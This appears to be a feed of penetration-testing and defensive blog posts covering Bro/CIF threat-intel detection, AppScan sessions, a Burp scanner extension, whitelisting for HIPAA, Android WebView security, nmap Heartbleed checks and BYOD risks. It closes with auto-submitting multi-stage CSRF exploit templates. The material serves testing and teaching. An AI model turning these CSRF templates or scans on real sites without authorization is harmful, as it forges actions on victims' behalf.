Where /opt/bro/feeds/domain-malware.intel is where you have placed the file generated by CIF. You can add as many files as you want. For more information about different methods to refer to these .intel files check http://blog.bro.org/2014/01/intelligence-data-and-bro_4980.html.

Now the Input Framework will read the information from our text-based file and will send it to the Intel Framework for processing.

To demonstrate the combined usage of Bro and CIF I have created sample4.pcap, a simple capture that contains a DNS query to a malicious domain (winrar-soft.ru). Let’s replay this capture with Bro after making all the changes described above:

 $ bro -r sample4.pcap local


See how a new file, intel.log has been created:

 $ cat intel.log 

#separator \x09
#set_separator ,
#empty_field (empty)
#unset_field -
#path intel
#open 2014-03-07-21-28-09
#fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc seen.indicator seen.indicator_type seen.where sources
#types time string addr port addr port string string string string enum enum table[string]
1394223877.224159 C7J79H2v6YLWMaJEk6 192.168.68.138 54212 192.168.68.1 53 - - - winrar-soft.ru Intel::DOMAIN DNS::IN_REQUEST CIF - need-to-know
#close 2014-03-07-21-28-10



Since winrar-soft.ru was included in the feed generated by CIF and imported into Bro, now we can identify any attempt of connection to this malicious domain.

Conclusions

Security analysts will never have enough tools or resources to fight malware. Bro and CIF are two of those invaluable resources that every malware analyst should be aware of.

As their creators state, Bro is much more than an IDS. Bro is a full-featured network analysis framework created with a powerful tool, the Bro Programming Language.

If you want to know more about Bro, CIF, Malware Analysis or Network Forensics check the References section.

About the author

Ismael Valenzuela (GCFA, GREM, GCIA, GCIH, GPEN, GWAPT, GCWN, GCUX, GSNA, CISSP, CISM, 27001 Lead Auditor & ITIL Certified) works as a Principal Architect at McAfee Foundstone Services EMEA. Find him on twitter at @aboutsecurity or at http://blog.ismaelvalenzuela.com

References

Pcap samples used in this post:
Catching “bayas” on the Wire: Practical. Kung-Fu to detect Malware Traffic. SANS EU Forensic Summit:
Liam Randall’s samples, exercises and scripts:
Toolsmith: Collective Intelligence Framework:
The Bro Network Security Monitor:
Malware dumps and pcaps:
Collective Intelligence Framework:
Security Onion:
Remnux:

Combatting AppScan's "Scan out of session"

$
0
0
By Kunal Garg.

Web application scanners may be full of repetition and obvious vulnerabilities but they do have their place in a web application penetration test. While they should never be used as the sole way to identify vulnerabilities, they can provide baseline and act as another available tool to achieving maximum results. All web application scanners are different and some require finer tuning then others. One common issue we see with IBM's AppScan is the "Scan out of session" error. This blog post aims to give advice around setting up the scan and working around the issue.

When running post authentication scans “In-session” detection is important concept to maximize scan coverage. Anytime the scan will go out of session, notification “scan out of session”will be displayed to user and scan will be suspended.

With the in session management we basically select a unique pattern on an in-session page, which Appscan continually polls to find out if scan is in session or not. This pattern needs to be unique and should be available on post authentication pages. It can be any text such as “welcome userabc” displayed after a specific user logs on or it can be a logout button (if present on all the pages).

Recording the login

First step in configuring the in-session pattern is to record the login using Appscan macro. Once the login is recorded, tick the checkbox “I want to configure In-session detection” and click on next.



Notice all the URL’s recorded in login macro previously appear here, and select the page which is post authentication and contains our unique identifier. In our case, test application after login routes to “main.apsx”, this page therefore is selected as In-session page (Right click and set as In-session).



Now, it’s time to select the In-session pattern this can be selected using the “Select in session pattern” button.

Usually, Appscan will select the session identifier on its own. But it is always advisable to look into the pattern and change the pattern if it’s not unique. In my personal experience with the automatically selected identifiers scans tend to run out of session.

Session pattern can be either selected from the page or its response body in the appscan browser window as shown below.



Session pattern is marked as “signoff”.

If the scan goes out of session there are certain points which we need to consider:

  1. Session cookies are not properly tracked. If the session cookies are not getting tracked it can be marked for tracking from “Login management”.



  2. Check if the application is still accessible.
  3. Check if the user account is not locked out.


Note: While run In-session scans make sure that, login and logout pages are out of scope, and please take due care while running automated scans and configuring them.

Extending Burp Proxy With Extensions

$
0
0
By Chris Bush.

The world of information security is awash with tools to help security practitioners do their jobs more easily, accurately and productively. Regardless of whether you are responsible for doing PCI audits, network vulnerability assessments, enterprise risk assessments, social engineering, or what have you, there’s a tool for that. Usually there are several. Some are good, some not so much. One of the reasons a tool may or may not ultimately be useful is the ability for its functionality to be customized or extended to meet the needs of the practitioner using it. This is never truer than in application security, where every application the security tester confronts is different from the last. Bespoke applications demand bespoke security testing, and this requires that the tools used by the application security professional be not only robust and feature rich, but customizable in a way that allows them to be rapidly extended to fit to the needs of the job at hand.

Pound for pound (or maybe dollar for dollar), the Burp Suite is one of the best tools an application security professional can have in their tool kit. It has capabilities and features on par with, or exceeding, those of big-name commercial application scanners costing tens of thousands of dollars more, all in a single UI where all of the tools integrate and work together seamlessly. Often overlooked is the fact that Burp includes an extensibility framework that allows you to extend Burp’s functionality in a number of useful ways, through loading 3rd party extensions, or writing your own.

An Overview of Extending Burp

The Burp extensibility framework provides the ability to easily extend Burp’s functionality in many useful ways, including:

  • Analyzing and modifying HTTP requests/responses
  • Customizing the placement of attack insertion points within scanned requests
  • Implementing custom scan checks
  • Implementing custom session handling
  • Creating and issuing HTTP requests
  • Controlling and initiating actions within Burp, such as initiating scans or spidering
  • Customizing the Burp UI with custom tabs and context menus
  • Much, much more


There are a growing number of 3rd party extensions available that you can download and use. The BApp Store was recently created, providing access to a number of useful extensions that you can download and add to Burp. Beginning with Burp Suite version 1.6 beta, released along with the BApp Store on March 4, 2014, access to the BApp Store is also provided directly from within Burp’s UI.

Additionally, there are a number of examples available in the Portswigger blog that provide an excellent starting point for writing your own extension, depending on what you are trying to accomplish. Go to the Burp Extender page to see an overview of some of these examples, including a links to the full blog posts and downloadable code. And of course, you can always turn to the Burp Extension User Forum for help with writing your own extensions, and more examples contributed by the user community.

In the rest of this article, we’ll provide a quick overview of the Burp Extender tool, which you will use to load extensions and configure Burp to run those extensions. Then we’ll dive right into writing our own custom extension, and create an extension that performs a couple of custom passive scans.

Burp Extender Tool

First, let’s take a look at the Burp Extender Tool. When you select the Extender tab in Burp Suite, there are four sub-tabs that provide access to the functionality and configuration options of the Extender.

Extensions

The Extensions tab (shown below) allows you to load and manage the extensions you are using in Burp. From this you can add and remove your extensions, as well as manage the order in which extensions and their resources are invoked. The panel at the bottom provides details on a selected extension, as well as tabs to display any output written by the extension, as well as any error messages produced by the extension.



BApp Store

The BApp Store tab, new with version 1.6 beta of Burp Suite, provides direct access to downloadable extensions from the Portswigger BApp Store.



APIs

The APIs tab essentially just provides a convenient reference to the Burp Extensibility API. From here, you can also download the Java interface files, for inclusion in your Java project, as well as download the Javadocs as a set of HTML files that you can access locally for reference.



Options

Finally, the Options tab is where you will configure things like the location of different environments required to run your extensions, depending on whether the extension is written in Java, Python, or Ruby. To run extensions written in Python requires the use of Jython, a Python interpreter that is written in Java. Similarly, to run extensions written in Ruby requires the use of JRuby, a Ruby interpreter written in Java. The Options tab allows you to specify the locations of the Jython JAR file or JRuby JAR file respectively. Download the most recent versions of these and configure Burp Extender to point to them if you will be writing extensions in Python or Ruby.



Loading and managing extensions and configuring the runtime options needed is very straightforward and simple. Refer to the Burp Extender Help page online for additional information.

Writing Your Own Extensions

You can write your own extensions in Burp using the Burp Extensibility API. The API consists of a number of Java interfaces that you will provide implementations of, depending upon what you are trying to accomplish. It is beyond the scope of this article to cover the entire API in detail. Refer to the Burp Extender Javadoc page online for a complete description. Instead, we’ll cover a few key interfaces that are used by all extensions, some that are of practical use to nearly all extensions, as well as some that will be useful in understanding the example extension that will be presented later in this article. As indicated previously, Burp extensions can be written in Java, Python, or Ruby. Choose the language you are most familiar with. We’ll use Python here, for its familiarity and the ease of development as an interpreted language. While code examples provided in this article will be in Python, they should be easily read and understood by anyone with a programming background in Java or another high-level language.

IBurpExtender

The IBurpExtender class is the foundation of every extension you will write. A Burp extension must provide an implementation of IBurpExtender that is declared public, and implements a single method, called registerExtenderCallbacks. This method is invoked when the extension is loaded into Burp, and is passed an instance of the IBurpExtenderCallbacks class. This class provides a number of useful methods that can be invoked by your extension to perform a variety of actions. At its very simplest, an extension in Burp starts out like this:

 from burp import IBurpExtender
class BurpExtender(IBurpExtender):
def registerExtenderCallbacks(self, callbacks):
# put your extension code here
return



IBurpExtenderCallbacks

As indicated above, an instance of this class is passed to the registerExtenderCallbacks method in your IBurpExtender implementation when the extension is loaded in Burp. Through this callbacks object, you have access to a wide variety of useful methods that will help you create your extension. I’ll point out just a few, as these will be of importance as we build out our example custom scanner extension to follow.

  • getHelpers– Obtain an instance of the IExtensionHelpers class, which provides numerous useful "helper" methods that can be used to add functionality to an extension.
  • setExtensionName– Sets the name of the extension as it will appear in the Extensions tab in Burp Suite.
  • registerScannerCheck– Used to register an extension as a custom Scanner check.
  • applyMarkers– Used to apply markers, or highlights, to areas of a request or response. For instance, this may be used to mark a vulnerable parameter in a request, or an area of the response that indicates a vulnerability, such as a reflected XSS payload.


This is just a small taste. There are many other methods available to you in an instance of IBurpExtenderCallbacks. Consult the Burp Extender Javadoc page online for complete details.

IExtensionHelpers

The IExtensionHelpers class provides access to another large set of methods that you will undoubtedly find useful. It will be the rare extension that doesn’t get an instance of this class, which is obtained using a call to the getHelpers() method of IBurpExtenderCallbacks (see above). Just a few examples of the methods provided by this class are the following:

  • analyzeRequest– Used to analyze an HTTP request, and obtain various details, such as a list of parameters , headers, and more.
  • analyzeResponse– Used to analyze an HTTP response, and obtain various details, such as a list of cookies, headers, the response code, and more.
  • urlEncode– Perform URL encoding on a piece of data.
  • urlDecode– Perform URL decoding on a piece of data.
  • indexOf– Searches a piece of data for a specified pattern. This is very useful for search a request or a response for a specific value, such as PII, or examining the response for a parameter value that was in the corresponding request.
  • bytesToString– Converts data from an array of bytes to a String object. Many of the methods in the Burp API operate on an array of bytes, so this comes in quite handy.

IScannerCheck

Extensions implement this interface when they are going to be used to perform custom scan checks. Your extension must call the registerScannerCheck method of the IBurpExtenderCallbacks class to tell Burp that it is implementing this interface. Burp will then know to use your extension when performing active or passive scans on a base request/response pair, as well as to report any issues (see IScanIssue below) identified by your custom scan checks. The following three methods may be implemented by an IScannerCheck class:

  • consolidateDuplicateIssues– This method is invoked when the custom Scanner check has reported multiple issues for the same URL. You use this to tell Burp whether to keep the existing issue, or replace with the new issue, based on whatever criteria you decide.
  • doActiveScan– This method is invoked for each insertion point that is actively scanned by Burp. An implementation of this will then construct a new request, based on the base request passed, and insert a test payload into the specified insertion point. It will then issue that new request, and examine the response for an indication that the inserted payload reveals a vulnerability.
  • doPassiveScan– This method is invoked for each base request/response pair that Burp passively scans. An implementation of this will typically examine the base request and/or response for patterns of interest. No new requests should be generated from a passive scan.


Both the doActiveScan and doPassiveScan methods must return a list of IScanIssue objects, which Burp will then automatically include in the Scanner issues report.

IScanIssue

The IScanIssue class provides a representation of a Scanner issue. An extension may retrieve current issues (IScanIssue objects) from the Scanner tool by registering an IScannerListener callback, or by calling the getScanIssue method of the IBurpExtenderCallbacks class. Scanner issues can be added to Burp by implementing the IScanIssue class in your extension, and calling the addScanIssue method of the IBurpExtenderCallbacks class with specific instances. Additionally, Scanner issues can be added via a custom scan check, by creating a list of instances of IScanIssue that is returned by either the doPassiveScan or doActiveScan methods of an IScannerCheck implementation.

Implementing the IScanIssue interface involves implementing a constructor method to set the details of the Scanner issue, as well as a number of getter methods to retrieve those details. We won’t go into details of the various methods here, as they will often be as simple as setting a class variable with a value passed to the constructor, and implementing a getter method that returns this value.

A Custom Passive Scanner



To conclude our discussion, we will present an example extension that implements a custom scanner, which will perform two different passive scan checks:

  • Reflection Checks– Using the values of the parameters in the base request that is being passively scanned, this check searches the corresponding response for those same values, providing a candidate point for further testing for reflected XSS vulnerabilities.
  • Regular Expression Match– Can be used to examine the base response of a passive scan request, looking for any string that matches a particular regular expression. In the context of this example extension, this check is used to do a customized search of application responses using a regular expression designed to match potentially sensitive personally identifiable information (PII) unique to a specific, non-US, country.


The full source code for this example extension can be downloaded from our GitHub page. This extension is written in Python, so to try it out you will first need to download the latest Jython library from The Jython Project, and configure the Burp Extender to use it. Then add the extension, and try it out.

The source code is extensively documented with comments. With the information provided above, as well as the Burp API Javadocs and the comments in the code, it should be easy to grasp what’s going on in the code. In the remainder of this article, I’ll go into a little detail for a few key sections of the code that may be particularly interesting or require some further context for understanding.

Earlier, we showed the simplest example of a Burp extension that does nothing. Recall that at a minimum an extension must implement the IBurpExtender interface, which has one method – registerExtenderCallbacks. Let’s take a quick look at the implementation of our registerExtenderCallbacks method.

 Line 15-26
def registerExtenderCallbacks(self, callbacks):
# Put the callbacks parameter into a class variable so we have class-level scope
self._callbacks = callbacks

# Set the name of our extension, which will appear in the Extender tool when loaded
self._callbacks.setExtensionName("Custom Passive Scanner")

# Register our extension as a custom scanner check, so Burp will use this extension
# to perform active or passive scanning and report on scan issues returned
self._callbacks.registerScannerCheck(self)

return



The registerExtenderCallbacks method is passed an instance of the IBurpExtenderCallbacks class. On line 17 above, we are simply storing this callbacks object in a class variable, so that it has class-level scope, allowing any other methods within our BurpExtender class to access it. On line 20, we use one of the methods of the callbacks object, setExtensionName, to set the name of our extension. This is how the extension will be identified in the Extender tool when it is loaded. Finally, on line 24, we call the registerScannerCheck method of the callbacks object. This tells Burp that our extension implements a custom scanner check, and Burp will now call the doActiveScan and doPassiveScan methods of our extension whenever it is performing an active or passive scan, respectively. In our extension, we have only implemented doPassiveScan.

Our implementation of doPassiveScan makes use of a custom class that we have created, called CustomScans, which is not an implementation of anything in the Burp API.

 Line 47
self._CustomScans = CustomScans(baseRequestResponse, self._callbacks)



As we see above, within doPassiveScan, an instance of this class is created, passing the base request/response pair, as well as our instance of IBurpExtenderCallbacks that was created as a class variable in the registerExtenderCallbacks earlier. The purpose of the CustomScans class is to implement one or more methods that we can call that perform unique scan checks against the base request/response pair being passively scanned. In this extension, we’ve implemented two methods in CustomScans, called findReflections and findRegEx, whose purpose was described above.

Next, the extension’s implementation of doPassiveScan calls the findReflections method of CustomScans. This method will examine the base request/response pair, passed previously to the constructor for CustomScans, and identify any request parameters whose value appears in the corresponding response.

 Line 51-62
issuename = "Possible Reflected XSS"
issuelevel = "Information"
issuedetail = """The value of the $param$ request parameter appears
in the corresponding response. This indicates that there is a
potential for reflected cross-site scripting (XSS), and this URL
should be tested for XSS vulnerabilities using active scans and
thorough manual testing and verification. """

tmp_issues = self._CustomScans.findReflections(issuename, issuelevel, issuedetail)

# Add the issues (if any) from findReflections to the list of issues to be returned
scan_issues = scan_issues + tmp_issues



Three arguments passed to findReflections provide information used to construct any new scan issues, including the issue name, level (or severity), and issue details. Note that the argument representing the issue details contains HTML tags. Burp will interpret these tags and render the issue details in its UI accordingly. Finally, the findReflections method returns a list of scan issues, in tmp_issues, which is then appended to the list of issues, scan_issues, which will ultimately be returned to Burp from doPassiveScan.

Following the above code, lines 69-81 follow a similar patter, calling CustomScans.findRegEx, and appending any resulting issues to the scan_issues list. Lines 85-88 then returns scan_issues if it is not empty, else it returns None (think null). Burp will then include the returned issues, if any, in the Scanner issues report.

The findReflections and findRegEx methods of CustomScans should be fairly straightforward to understand, and each follows a very similar flow. Lines 127-136 of findReflections, and lines 160-169 of findRegEx in particular follow a very similar pattern, which we’ll explain below.

 Line 127-136 (findReflections)
offset[0] = start
offset[1] = start + len(paramVal)
offsets.append(offset)

# Create a ScanIssue object and append it to our list of issues, marking
# the reflected parameter value in the response.
scan_issues.append(ScanIssue(self._requestResponse.getHttpService(),
self._helpers.analyzeRequest(self._requestResponse).getUrl(),
[self._callbacks.applyMarkers(self._requestResponse, None, offsets)],
issuename, issuelevel, issuedetail.replace("$param$", paramName)))


The first three lines set up an array that is used to store offsets used to apply a marker to a region of the response, in this case to highlight the reflected parameter value. The first array element contains the start position of the identified value, and the second element contains its end position. This array of two values is then appended to a list, called offsets, which will be passed to the applyMarkers method of IBurpExtenderCallbacks when the new scan issue is created. The applyMarkers method expects a List of arrays in its last two arguments, each array containing the start and end values of regions to be marked in the request and response respectively.

The last four lines above create an instance of our ScanIssue class, which is our extension’s implementation of the IScanIssue interface, by calling its constructor using a number of arguments. We then append that new instance of ScanIssue to a list, called scan_issues, which will be returned back to our caller, doPassiveScan. In the call to the constructor for our Scan, we call the applyMarkers method of IBurpExtenderCallbacks, passing the base request/response pair, and offsets for applying markers to the request (None in this case), and to the response, using the list, offsets, described above. The last three arguments to the ScanIssue constructor provide the issue name, issue level (severity), and issue detail information that was passed as arguments to findReflections. Here, we are replacing a token in the literal string passed in the issuedetail argument with the actual parameter value that was reflected in the response. This adds useful detail to the new scan issue for the tester, and also makes it so Burp will identify the issue as a unique instance when it calls our extension’s consolidateDuplicateIssues method.

The findRegEx method in CustomScans follows a similar pattern to that described above for findReflections. It makes use of Python’s regular expression operations to search the response, but otherwise uses the same techniques to create new scan issues as in findReflections.

One part of findReflections that is perhaps non-intuitive when examining the code is the following:

 Line 122
if len(paramVal) > 3:



Here we are checking the length of the variable paramVal, which contains the value of the current parameter we are checking for reflection of. In order to prevent a lot of noise from coincidental matches, we are simply checking that the parameter’s value is greater than three characters long. This is a fairly simplistic approach, and you are free to try any heuristic you can think of here. Regardless of what you try, since this is a passive scan, eliminating potentially coincidental matches may also eliminate true reflection of parameter values that may in fact be vulnerable to XSS. Remember, the point of this passive XSS scan is only to identify candidate points for further examination and testing, not to actually identify XSS vulnerabilities. Caveat emptor.

Lastly, there are some additional classes from the Burp Extensibility API that are being used in the example extension that have not been covered here. These classes are not explicitly implemented in the extension, but are used implicitly, typically as return values from other methods in the Burp API. They are mentioned briefly below, but you are encouraged to examine these in more detail in the Burp Extender Javadoc page online.

  • IHttpRequestResponse– Representation of an HTTP message
  • IHttpService– Representation of an HTTP service, to which requests can be sent
  • IRequesetInfo– Representation of an HTTP request
  • IParameter– Representation of an HTTP request parameter


Conclusion

As you can see, while it does involve some programming, creating Burp extensions is really quite straightforward, and should be no problem for anyone with a reasonable programming or scripting background. In the above example, we have the basics of a fairly useful custom scan check extension that performs two different passive scan checks, in around 160 lines of code (excluding comments).

Try out the example above, visit the new BApp Store, study the Burp Extensibility APIs, and you’re sure to come up with ideas for your own extensions that will help you do your job more easily, accurately, and productively, and get better results by customizing Burp to meet your particular needs. Best of luck.
 root@bt:~# 


Application Whitelisting Programs, WinXP EoS, and HIPAA's Security Rule

$
0
0
By The Foundstone Strategic Services Team.

The United States Department of Health and Human Services (HHS) has stated that the “Security Rule does not specify minimum requirements for personal computer operating systems”. Microsoft’s own Windows XP enterprise end of support website points readers directly to the Health and Human Services (HHS) Security Rule guidance on operating system requirements for the personal computer systems used by a covered entity. The HHS guidance covers a situation such as Windows XP End of Support(EoS) when it states that:

"any known security vulnerabilities of an operating system should be considered in the covered entity’s risk analysis (e.g., does an operating system include known vulnerabilities for which a security patch is unavailable, e.g., because the operating system is no longer supported by its manufacturer).”

HHS guidance explicitly addresses the security compliance that an operating system provides when it states:

“the security capabilities of the operating system may be used to comply with technical safeguards standards and implementation specifications such as audit controls, unique user identification, integrity, person or entity authentication, or transmission security.”

It is clear that an unsupported operating system will need to have significant technical safeguards deployed and configured properly to reduce the risk of exploitation of the unsupported operating system. Application whitelisting programs used to be considered an optional technical security control, but as the nature of networks and applications changed, application whitelisting programs moved past being a “best practice” years ago. It is now considered both a basic and standard security control. When configured properly, these programs can arguably be the strongest component of operating system defense in depth. It can protect against the deliberate or inadvertent exploitation of operating system vulnerabilities, regardless of whether the workstation activity is performed by authorized users, unauthorized users, or malware. Application whitelisting programs have been identified as the first of the five “Quick Wins” in the Top 20 Security Controls – these are the sub-controls that have the most immediate impact on preventing attacks.

These programs offer a range of features that significantly reduces the attack surfaces that threats are actively attempting to exploit. Risk is reduced because there is much less opportunity to deliberately or unintentionally exploit potential weak spots or vulnerabilities. The abilities of application white-listing programs to limit, disable, or restrict access makes it a significant part of defense in depth best practices for all operating systems, including Windows XP as it becomes unsupported.

We'll focus on the feature set of McAfee's Application Control since this is most available to us, but most other feature rich whitelisting applications should contain similar functionality. If you're unsure if all of these items are addressed with the particular program you're evaluating, reach out to the vendor or conduct your own analysis

Application Control

Achieving compliance with the Security Rule while continuing to use Windows XP will involve documenting your risk analysis and using reasonable and appropriate technical safeguards such as application white listing to reduce the likelihood that threats can exploit vulnerabilities.

Human Threats Addressed:

  • Abuse of Information System
  • Abuse of Privileges
  • Abuse of Resources
  • Damage to ePHI or Business Information
  • Destruction of ePHI or Business Information
  • Theft of ePHI or Business Information
  • Theft of Financial Assets


Threat Agents:

  • Reckless Insiders
  • Untrained Insiders
  • Reckless Information Partner
  • Untrained Information Partner
  • Reckless Line of Business
  • Untrained Line of Business
  • Disgruntled Insider
  • Disgruntled Information Partner
  • 3rd Party Threats
  • Organized Crime


Application whitelisting programs also directly supports you if you will be the recipient of a HIPAA Audit Protocol assessment pursuant to the HITECH Act audit mandate. It can specifically enforce or support compliance for components in the Audit Protocol assessment of;
  • Information Access Management §164.308(a)(4)
  • Workstation Use (§164.310(b))
  • Access Control requirement “to allow access only to those persons or software programs that have been granted access rights”
  • Audit Control (§164.312(b))


For environments where there is a need to comply with the Centers for Medicare & Medicaid Services (CMS) requirements which involve NIST 800-53 standards, Application whitelisting programs support meeting these NIST control family standards;

  • Access Control (AC) - This control family includes mechanisms used to designate who or what is to have access to a specific resource and the type of transactions and functions that are permitted.
  • Configuration Management (CM) - This control family aims to address the activities that present a risk of integration failure due to component change. This includes change control processes and asset management.
  • Maintenance (MA) - This control family addresses the requirement that trusted systems within the environment retain their trustworthiness over time. Key elements include patch management, system builds, and hardening processes
  • System and Information Integrity (SI)– The controls in this family are used to protect data from accidental or malicious alteration or destruction and to provide assurance to the user the information meets expectations about its quality and integrity. Additionally, this family covers various aspects of flaw remediation.


CMS has also referenced the Top 20 Critical Security Controls (now maintained by The Council on CyberSecurity). The latest version of the Top 20 (Critical Controls Version 5.0) continues identifying application whitelisting as the first of five “Quick Wins”; these are the sub-controls that have the most immediate impact on preventing attacks.

Enjoy!



*Image above was borrowed from here

Secure Usage of Android Webview:

$
0
0
By Naveen Rudrappa

The WebView class is one of the most powerful classes and it renders web pages like a normal browser. Applications can interact with WebView by adding a hook, monitoring changes being made, add JavaScript, etc. Even though this seems like a great feature; it brings in security loopholes if not used with caution. Since WebView can be customized, it creates the opportunity to break out of the sandbox and bypass the same origin policy.

WebView allows sandbox bypass in two different scenarios:

  1. JavaScript can invoke Java code.
  2. Java code can invoke JavaScript.


Sample code to Invoke Java from JavaScript:

 wv.addJavascriptInterface(new FileUtils(), "file");
< script>
filename = '/data/data/com.Foudnstone/data.txt';
file.write(filename, data, false);
< /script>



Sample code to Invoke JavaScript from Java:

 String javascr = "javascript: var newscript=document.createElement(\"script\");";
javascr += "newscript.src=\"http://www.foundstone.com\";";
javascr += "document.body.appendChild(newscript);";
myWebView.loadUrl(javascr);



Another way to support sandboxing is to implement addJavascriptInterface. However any class declared using addJavascriptInterface allows for commands to be run on android device from JavaScript, leading to complete compromise. Hence implementing addJavascriptInterface is also not safe.

Hence to implement secure usage of WebView follow the below mentioned solutions:

  • Compile application against Android API level equal or more than 17. This API forces developer to add @JavascriptInterface to any method that is to be exposed to JavaScript. This also prevents access to operating system commands (via java.lang.Runtime).
  • Disable Support for JavaScript. If there is no reason to support JavaScript within the WebView, then it should be disabled. The Android WebSettings class can be used to disable support for JavaScript via the public method:
     setJavaScriptEnabled.webview = new WebView(this); webview.getSettings().setJavaScriptEnabled(false);


  • Send all traffic over SSL. Any traffic in clear is easy to sniff and manipulate using a Man-in-The-Middle attack. Thus an hacker cannot inject script via MITM and can not break sandbox of webview.
  • To avoid security issues from the WebView, always restrict users to the application domain using code as below which prevents WebView security issues. By restricting user to known domain we are secure from Javascript being loaded from untrusted websites.
     WebViewclient wvclient = New WebViewClient() {
    // override the "shouldOverrideUrlLoading" hook.
    public boolean shouldOverrideUrlLoading(WebView view,String url){
    if(!url.startsWith("http://clientlocation.com")){
    Intent i = new Intent("Android,intent.action.VIEW",Uri.parse(url));
    startActivity(i);
    // override the "onPageFinished" hook.
    public void onPageFinished(WebView view, String url) { ...}
    }
    webView.setWebViewClient(wvclient);
    // override the "onPageFinished" hook.
    public void onPageFinished(WebView view, String url) { ...}
    }
    webView.setWebViewClient(wvclient);


Heartbleed Recap and Testing

$
0
0
By Mateo Martinez and Melissa Augustine.

CVE-2014-0160 also known as the "Heartbleed Bug", is a serious vulnerability in OpenSSL, one of the most widely used cryptographic libraries. This bug has been present in OpenSSL since March 14, 2012 with the release of version 1.0.1 and specifically affects OpenSSL's implementation of the TLS/DTLS protocols.

To summarize, Heartbleed allows anyone to read the memory of a system running services that use OpenSSL for TLS/DTLS.

Why HeartBleed?

TLS/DTLS leverage “hearbeat”, or “keep alive” messages once a session is established to let hosts know that a connection is still needed and active. Here is an example of a normal heartbeat that occurs after the initial SSL connection has already taken place.



OpenSSL implemented this heartbeat in a way that allowed the user to TELL the server how much data it wanted to echo back. A client can request up to 64k of memory per heartbeat. Stored within the memory can be anything processed by the service, including usernames, passwords, and private keys.



Affected Versions and Recommendations

OpenSSL versions 1.0.1 through 1.0.1f are vulnerable and the fix was implemented in version 1.0.1g. The blanket recommendation is to apply the patch and change passwords. It is important as a user to ensure whatever application you are using has already implemented the patch before changing your passwords; otherwise your new password may still be susceptible to attack.

Prior Detection

How do you tell if someone has used the attack against you in the past? Well, that’s the tricky part - this bug was unknown for a long time, so prior to its release no sensors or products would detect it occuring. If you maintain network captures for your network, you may be able to query that data and look for a signature.. but there is nothing left on the server side that would be an indicator it was being exploited.

Now that the attack has been publicly disclosed, there are now a multitude of detection mechanisms in place to alert administrators of a Heartbleed attack (including Snort, Tripwire, and Honeypot scripts) .

Testing

There are a ton of ways to test for Heartbleed - McAfee has released a Heartbleed Checker tool, there is a metasploit module, and even a nmap nse script. We'll cover the nmap script here.

Using NMAP

Checking HeartBleed with NMAP is a painless process. Firstly you'll need to download the script and place it in the default NSE folder (/usr/share/nmap/scripts)



Next download the TLS library to the nselib folder:



Now make sure nmap has updated it script db:

 root@kali:~# nmap --script-updatedb




And you're ready to roll! To test a specific URL you can run:

 root@kali:~# nmap -vv -p 443 --script ssl-heartbleed www.somesite.com -oN somesite_outputfile



To test a range of hosts you can use:

 root@kali:~# nmap -vv -p 443 --script ssl-heartbleed 192.168.1.0/24 -oN subnet_outputfile



And to test multiple ports, just run:

 root@kali:~# nmap -sV -p 443,8443,6443 --script=ssl-heartbleed.nse 192.168.1.1



Recap of BYOD Risks

$
0
0
By Kunal Garg.

Bring Your Own Device (BYOD) has been a hot topic over the last two years as organizations begin to permit employees to bring personally owned mobile devices (such as laptops, tablets, and smart phones) to their workplace, and let them use those devices to access the corporate network and sensitive information on it.

Businesses usually get some advantage with this program, as the cost for acquiring device is already born by the user/employee which may save companies a lot of money. Other benefits are increased productivity efficiency and the ability to work remotely.

Risks and vulnerabilities also increase when end user devices come in picture on an already hardened and secure network. Company has control over the issued corporate owned devices and has necessary security mechanisms in place. Implementing security technologies and defining an acceptable use policy for user owned device is not an easy task. It is pretty hard for an “IT guy” to tell the end user what to do and what not to do on their swanky phones, tablets and laptops.

Some of the common risks associated with BYOD program:

  1. Jail breaking/Rooting - Many users’ jail break /root there phone to have admin privileges and rights on the phone. These custom jail break apps are just install and run, and it’s fairly easy for novice user to root the device. This process however beats the in-built security mechanisms implemented in devices and also opens the attack surface.
  2. Mobile Accessibility - Mobile devices can move far beyond the boundaries of the corporate network. Open Wireless networks available in coffee shops, airports etc. gives attacker the opportunity to directly communicate with the corporate owned entity, perform Man in the middle attack, and sniff the network traffic for sensitive data.
  3. Personal/Corporate Separation - A personal device is used for far different purposes, and far more often then a corporate device. This places the security decision in the user more than ever. A malicious application may have far greater consequences when installed on a corporate device. For instance, granting excessive permissions to a mobile application may seem harmless to a user but may result in data leakage.
  4. Lost or stolen devices - Lost or stolen devices tend to possess serious security risk, as a lot of sensitive information is on the device. Devices should have solution of remote wipe/clean.
  5. Employee Resignation/Termination - If the employee is let go, or leaves the company, recovering and deleting company data can be a problem. There should be a policy in place that governs how that data will be retrieved from the personal laptop and/or smartphone.
  6. Device Sharing - Mobile devices are more likely to be occasionally shared, potentially putting corporate data at risk. A person with malicious intent can read sensitive information on enterprise applications. Re-authentication upon each access and two factor authentication should be implemented.


What risks do you see around BYOD? Let us know in the comments below!



Multi-Staged/Multi-Form CSRF

$
0
0
By Deepak Choudhary.

Exploiting a CSRF vulnerability that relies on a single request (GET/POST) is often a simple task, and tools like Burp make effort even easier. However, exploitation can become much more difficult when multiple requests are needed to exploit an CSRF vulnerability.

This is common with edit, add, and delete actions on a web page where a user has to confirm a change (e.g. "Are you sure you'd like to...?").



Multi-staged requests add an add level of complexity since they can be either GET Requests, POST Requests, or a combination of both. This makes it slightly more complicated to exploit in a single click.

The following are a few multi-staged CSRF templates that you can use to aid in exploitation.

GET-GET Requests

<html>
<head>
<script language="JavaScript">
function abc()
{
window.open("https://www.example.com/first.aspx");
window.setTimeout( function () { document.forms[0].submit()}, 12000);
}
</script>
</head>
<body onload="abc();">
<form action="https://www.example.com/second.aspx" method="GET">
<input type="submit" value="Submit request" />
</form>
</body>
</html>



POST-POST Requests

<html>
<body>
<form id="form1" method="POST" target="_blank" action=" https://www.example.com/first.aspx">
<input type="hidden" name="test1" value="1">
<input type="submit" value="form1">
</form>

<form id="form2" method="POST" target="_blank" action=" https://www.example.com/second.aspx">
<input type="hidden" name="test2" value="2">
<input type="submit" value="form2">
</form>

<script>
document.getElementById("form1").submit();
window.setTimeout( function () { document.forms.form2.submit()}, 12000);
</script>
</body>
</html>



GET-POST Requests

<html>
<head>
<script language="JavaScript">
function abc()
{
window.open("https://www.example.com/first.aspx");
window.setTimeout( function () { document.forms[0].submit()}, 12000);
}
</script>
</head>
<body onload="abc();">

<form action=" https://www.example.com/second.aspx" method="POST">
<input type="hidden" name="parameter1 name " value="test1" />
<input type="hidden" name="parameter2 name" value="test2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



